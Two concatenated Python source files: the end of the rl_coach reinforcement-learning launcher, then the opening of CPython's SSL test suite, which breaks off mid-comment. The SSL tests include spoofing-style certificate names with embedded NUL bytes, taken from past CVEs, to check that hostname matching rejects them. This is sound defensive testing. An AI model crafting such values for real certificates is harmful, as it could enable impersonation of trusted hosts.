screen.warning("Exporting ONNX graphs requires setting the --checkpoint_save_secs flag. "
"The --export_onnx_graph will have no effect.")
return args
def get_argument_parser(self) -> argparse.ArgumentParser:
"""
This returns an ArgumentParser object which defines the set of options that customers are expected to supply in order
to launch a coach job.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--preset',
help="(string) Name of a preset to run (class name from the 'presets' directory.)",
default=None,
type=str)
parser.add_argument('-l', '--list',
help="(flag) List all available presets",
action='store_true')
parser.add_argument('-e', '--experiment_name',
help="(string) Experiment name to be used to store the results.",
default='',
type=str)
parser.add_argument('-r', '--render',
help="(flag) Render environment",
action='store_true')
parser.add_argument('-f', '--framework',
help="(string) Neural network framework. Available values: tensorflow, mxnet",
default='tensorflow',
type=str)
parser.add_argument('-n', '--num_workers',
help="(int) Number of workers for multi-process based agents, e.g. A3C",
default=1,
type=int)
parser.add_argument('-c', '--use_cpu',
help="(flag) Use only the cpu for training. If a GPU is not available, this flag will have no "
"effect and the CPU will be used either way.",
action='store_true')
parser.add_argument('-ew', '--evaluation_worker',
help="(flag) If multiple workers are used, add an evaluation worker as well which will "
"evaluate asynchronously and independently during the training. NOTE: this worker will "
"ignore the evaluation settings in the preset's ScheduleParams.",
action='store_true')
parser.add_argument('--play',
help="(flag) Play as a human by controlling the game with the keyboard. "
"This option will save a replay buffer with the game play.",
action='store_true')
parser.add_argument('--evaluate',
help="(int) Run evaluation only, for at least the given number of steps (note that complete "
"episodes are evaluated). This is a convenient way to disable training in order "
"to evaluate an existing checkpoint. If value is 0, or no value is provided, "
"evaluation will run for an infinite number of steps.",
nargs='?',
const=0,
type=int)
parser.add_argument('-v', '--verbosity',
help="(flag) Sets the verbosity level of Coach print outs. Can be either low or high.",
default="low",
type=str)
parser.add_argument('-tfv', '--tf_verbosity',
help="(flag) TensorFlow verbosity level",
default=3,
type=int)
parser.add_argument('--nocolor',
help="(flag) Turn off color-codes in screen logging. Ascii text only",
action='store_true')
parser.add_argument('-s', '--checkpoint_save_secs',
help="(int) Time in seconds between saving checkpoints of the model.",
default=None,
type=int)
parser.add_argument('-crd', '--checkpoint_restore_dir',
help='(string) Path to a folder containing a checkpoint to restore the model from.',
type=str)
parser.add_argument('-dg', '--dump_gifs',
help="(flag) Enable the gif saving functionality.",
action='store_true')
parser.add_argument('-dm', '--dump_mp4',
help="(flag) Enable the mp4 saving functionality.",
action='store_true')
parser.add_argument('-et', '--environment_type',
help="(string) Choose an environment type class to override on top of the selected preset.",
default=None,
type=str)
parser.add_argument('-ept', '--exploration_policy_type',
help="(string) Choose an exploration policy type class to override on top of the selected "
"preset."
"If no preset is defined, a preset can be set from the command-line by combining settings "
"which are set by using --agent_type, --experiment_type, --environemnt_type"
,
default=None,
type=str)
parser.add_argument('-lvl', '--level',
help="(string) Choose the level that will be played in the environment that was selected."
"This value will override the level parameter in the environment class."
,
default=None,
type=str)
parser.add_argument('-cp', '--custom_parameter',
help="(string) Semicolon separated parameters used to override specific parameters on top of"
" the selected preset (or on top of the command-line assembled one). "
"Whenever a parameter value is a string, it should be inputted as '\\\"string\\\"'. "
"For ex.: "
"\"visualization.render=False; num_training_iterations=500; optimizer='rmsprop'\"",
default=None,
type=str)
parser.add_argument('--print_networks_summary',
help="(flag) Print network summary to stdout",
action='store_true')
parser.add_argument('-tb', '--tensorboard',
help="(flag) When using the TensorFlow backend, enable TensorBoard log dumps. ",
action='store_true')
parser.add_argument('-ns', '--no_summary',
help="(flag) Prevent Coach from printing a summary and asking questions at the end of runs",
action='store_true')
parser.add_argument('-d', '--open_dashboard',
help="(flag) Open dashboard with the experiment when the run starts",
action='store_true')
parser.add_argument('--seed',
help="(int) A seed to use for running the experiment",
default=None,
type=int)
parser.add_argument('-onnx', '--export_onnx_graph',
help="(flag) Export the ONNX graph to the experiment directory. "
"This will have effect only if the --checkpoint_save_secs flag is used in order to store "
"checkpoints, since the weights checkpoint are needed for the ONNX graph. "
"Keep in mind that this can cause major overhead on the experiment. "
"Exporting ONNX graphs requires manually installing the tf2onnx package "
"(https://github.com/onnx/tensorflow-onnx).",
action='store_true')
parser.add_argument('-dc', '--distributed_coach',
help="(flag) Use distributed Coach.",
action='store_true')
parser.add_argument('-dcp', '--distributed_coach_config_path',
help="(string) Path to config file when using distributed rollout workers."
"Only distributed Coach parameters should be provided through this config file."
"Rest of the parameters are provided using Coach command line options."
"Used only with --distributed_coach flag."
"Ignored if --distributed_coach flag is not used.",
type=str)
parser.add_argument('--memory_backend_params',
help=argparse.SUPPRESS,
type=str)
parser.add_argument('--data_store_params',
help=argparse.SUPPRESS,
type=str)
parser.add_argument('--distributed_coach_run_type',
help=argparse.SUPPRESS,
type=RunType,
default=RunType.ORCHESTRATOR,
choices=list(RunType))
parser.add_argument('-asc', '--apply_stop_condition',
help="(flag) If set, this will apply a stop condition on the run, defined by reaching a"
"target success rate as set by the environment or a custom success rate as defined "
"in the preset. ",
action='store_true')
parser.add_argument('--dump_worker_logs',
help="(flag) Only used in distributed coach. If set, the worker logs are saved in the experiment dir",
action='store_true')
parser.add_argument('--is_multi_node_test',
help=argparse.SUPPRESS,
action='store_true')
return parser
def run_graph_manager(self, graph_manager: 'GraphManager', args: argparse.Namespace):
if args.distributed_coach and not graph_manager.agent_params.algorithm.distributed_coach_synchronization_type:
screen.error("{} algorithm is not supported using distributed Coach.".format(graph_manager.agent_params.algorithm))
if args.distributed_coach and args.checkpoint_save_secs and graph_manager.agent_params.algorithm.distributed_coach_synchronization_type == DistributedCoachSynchronizationType.SYNC:
screen.warning("The --checkpoint_save_secs or -s argument will be ignored as SYNC distributed coach sync type is used. Checkpoint will be saved every training iteration.")
if args.distributed_coach and not args.checkpoint_save_secs and graph_manager.agent_params.algorithm.distributed_coach_synchronization_type == DistributedCoachSynchronizationType.ASYNC:
screen.error("Distributed coach with ASYNC distributed coach sync type requires --checkpoint_save_secs or -s.")
# Intel optimized TF seems to run significantly faster when limiting to a single OMP thread.
# This will not affect GPU runs.
os.environ["OMP_NUM_THREADS"] = "1"
# turn TF debug prints off
if args.framework == Frameworks.tensorflow:
os.environ['TF_CPP_MIN_LOG_LEVEL'] = str(args.tf_verbosity)
# turn off the summary at the end of the run if necessary
if not args.no_summary and not args.distributed_coach:
atexit.register(logger.summarize_experiment)
screen.change_terminal_title(args.experiment_name)
task_parameters = TaskParameters(
framework_type=args.framework,
evaluate_only=args.evaluate,
experiment_path=args.experiment_path,
seed=args.seed,
use_cpu=args.use_cpu,
checkpoint_save_secs=args.checkpoint_save_secs,
checkpoint_restore_dir=args.checkpoint_restore_dir,
checkpoint_save_dir=args.checkpoint_save_dir,
export_onnx_graph=args.export_onnx_graph,
apply_stop_condition=args.apply_stop_condition
)
# open dashboard
if args.open_dashboard:
open_dashboard(args.experiment_path)
if args.distributed_coach and args.distributed_coach_run_type != RunType.ORCHESTRATOR:
handle_distributed_coach_tasks(graph_manager, args, task_parameters)
return
if args.distributed_coach and args.distributed_coach_run_type == RunType.ORCHESTRATOR:
exit(handle_distributed_coach_orchestrator(args))
# Single-threaded runs
if args.num_workers == 1:
self.start_single_threaded(task_parameters, graph_manager, args)
else:
self.start_multi_threaded(graph_manager, args)
def start_single_threaded(self, task_parameters, graph_manager: 'GraphManager', args: argparse.Namespace):
# Start the training or evaluation
start_graph(graph_manager=graph_manager, task_parameters=task_parameters)
def start_multi_threaded(self, graph_manager: 'GraphManager', args: argparse.Namespace):
total_tasks = args.num_workers
if args.evaluation_worker:
total_tasks += 1
ps_hosts = "localhost:{}".format(get_open_port())
worker_hosts = ",".join(["localhost:{}".format(get_open_port()) for i in range(total_tasks)])
# Shared memory
class CommManager(BaseManager):
pass
CommManager.register('SharedMemoryScratchPad', SharedMemoryScratchPad, exposed=['add', 'get', 'internal_call'])
comm_manager = CommManager()
comm_manager.start()
shared_memory_scratchpad = comm_manager.SharedMemoryScratchPad()
def start_distributed_task(job_type, task_index, evaluation_worker=False,
shared_memory_scratchpad=shared_memory_scratchpad):
task_parameters = DistributedTaskParameters(
framework_type=args.framework,
parameters_server_hosts=ps_hosts,
worker_hosts=worker_hosts,
job_type=job_type,
task_index=task_index,
evaluate_only=0 if evaluation_worker else None, # 0 value for evaluation worker as it should run infinitely
use_cpu=args.use_cpu,
num_tasks=total_tasks, # training tasks + 1 evaluation task
num_training_tasks=args.num_workers,
experiment_path=args.experiment_path,
shared_memory_scratchpad=shared_memory_scratchpad,
seed=args.seed+task_index if args.seed is not None else None, # each worker gets a different seed
checkpoint_save_secs=args.checkpoint_save_secs,
checkpoint_restore_dir=args.checkpoint_restore_dir,
checkpoint_save_dir=args.checkpoint_save_dir,
export_onnx_graph=args.export_onnx_graph,
apply_stop_condition=args.apply_stop_condition
)
# we assume that only the evaluation workers are rendering
graph_manager.visualization_parameters.render = args.render and evaluation_worker
p = Process(target=start_graph, args=(graph_manager, task_parameters))
# p.daemon = True
p.start()
return p
# parameter server
parameter_server = start_distributed_task("ps", 0)
# training workers
# wait a bit before spawning the non chief workers in order to make sure the session is already created
workers = []
workers.append(start_distributed_task("worker", 0))
time.sleep(2)
for task_index in range(1, args.num_workers):
workers.append(start_distributed_task("worker", task_index))
# evaluation worker
if args.evaluation_worker or args.render:
evaluation_worker = start_distributed_task("worker", args.num_workers, evaluation_worker=True)
# wait for all workers
[w.join() for w in workers]
if args.evaluation_worker:
evaluation_worker.terminate()
def main():
launcher = CoachLauncher()
launcher.launch()
if __name__ == "__main__":
main()
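# Example invocations (illustrative; available preset names depend on the
# installed rl_coach version, see --list):
#
#   python3 rl_coach/coach.py --list
#   python3 rl_coach/coach.py -p <PresetName> -r
#   python3 rl_coach/coach.py -p <PresetName> -n 4 --evaluation_worker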
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
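        # NULLBYTECERT embeds NUL bytes in its subject and subjectAltName;
        # the parser must report them verbatim instead of truncating at the
        # NUL (CVE-2013-4238).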
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
        # Methods on an unconnected SSLSocket propagate the original
        # OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
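        # match_hostname() is exercised against hand-built certificate dicts:
        # ok() expects a successful match, fail() expects CertificateError.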
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
        # wildcard in first fragment and IDNA A-labels in subsequent
        # fragments are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
